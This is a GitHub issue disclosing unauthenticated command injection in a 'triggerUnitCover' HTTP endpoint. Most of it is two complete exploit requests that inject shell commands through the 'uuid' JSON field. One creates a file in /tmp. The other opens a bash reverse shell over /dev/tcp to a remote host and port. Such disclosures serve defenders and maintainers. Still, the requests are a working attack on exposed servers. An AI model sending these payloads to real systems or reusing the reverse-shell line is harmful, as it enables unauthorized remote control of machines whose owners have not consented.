Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Unauthorized attackers can execute any command with triggerUnitCover Interface #49

Open
gaogaostone opened this issue Oct 28, 2024 · 0 comments
Open

Unauthorized attackers can execute any command with triggerUnitCover Interface #49

gaogaostone opened this issue Oct 28, 2024 · 0 comments

Comments

@gaogaostone
Copy link

When accessing the triggerUnitCover Interface with special request, unauthorized attackers can execute any command on the target system. Attacker can inject command in the parameter uuid.

Proof of concept:

The request with file creation and results are as following.
After sending the payload, wait for a period of time (10 seconds by default). Once the scheduled task is executed, you will find that the file is successfully created.

POST /cov/triggerUnitCover HTTP/1.1
Host: x.x.x.x:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 272

{
    "envType":"-Ptest",
  "subModule":"",
"uuid":"123yy || touch /tmp/0407_123 ||",
"gitUrl":"http://x.x.x.x:8080/root/haha.git",
"baseVersion":"7965193defdfb86692f6dfcf84f567b1c425f9e5",
"nowVersion":"fa8ffa7a44d469ee654e5b7a58bdb50539301f3d",
"type":"1"
}

image
image

The payload for reverse shell and execution results are as following.
After sending the payload, wait for a period of time (10 seconds by default). Once the scheduled task is executed, you will find that the file is successfully created.

POST /cov/triggerUnitCover HTTP/1.1
Host: x.x.x.x:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 296

{
    "envType":"-Ptest",
  "subModule":"",
"uuid":"123yy || bash -i >& /dev/tcp/x.x.x.x/9333 0>&1 ||",
"gitUrl":"http://x.x.x.x:8080/root/haha.git",
"baseVersion":"7965193defdfb86692f6dfcf84f567b1c425f9e5",
"nowVersion":"fa8ffa7a44d469ee654e5b7a58bdb50539301f3d",
"type":"1"
}

image
image
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@gaogaostone